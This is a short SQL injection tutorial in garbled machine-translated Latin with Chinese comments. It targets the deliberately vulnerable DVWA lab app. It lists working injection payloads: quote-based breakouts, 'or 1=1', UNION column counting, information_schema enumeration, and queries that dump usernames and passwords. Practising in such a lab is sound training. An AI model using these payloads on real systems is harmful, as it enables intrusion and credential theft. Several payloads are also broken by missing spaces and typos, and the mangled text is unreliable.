Kali centum instrumenta continet, quae variis informationibus munia securitatis adhiberi possunt, ut acumen probationis, investigationis securitatis
4. Manuale iniectio
4.1 Praeparatio Opera
Description: Practice manuale iniectio per applicationem telam fuci gradum;
Satus scopum fucum OWASP
Obvius fucus per pasco
Visita OWASP-dvwa project
Login
Lego sql iniectio applicationis
4.2 Reperio iniectio punctum
Nota: Maxime utitur uno quotes et effugium ingenia, maxime unum quotes principium;
#后台程序sql语句select first_name,last_name from users where user_id ='$id';#输入单引号('),相当于将sql语句闭合,后面就可以使用附加其他逻辑条件了select first_name,last_name fro users where user_id =''';
1
2
3
4
4.3 Logical OR
4.4 Coniecto numero columnarum
per unionem
' unionselect1,2#
1
2. per logicam OR*
'or1=1#
1
4.5 Da databases, tabulas et columnas
Ut nomen database
' unionselect1,database()#
1
Accipere mensam
' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
1
Accipere columna
' union select column_name,1 from information_schema.columns where table_name='users' #
1
4.6 Get data
//1. 获取单个字段数据' union select user,1 from users#
//2. 获取两个字段
'unionselectuser,password from users#
1
2
3
4
5
4.7 munus concat
Munus: Splice chordae plures in una chorda Syntax: concat(str1, str2,…) Exemplum:
Adepto user_id, usor, tesseram ab utentibus mensam et eas in duabus columnis ostende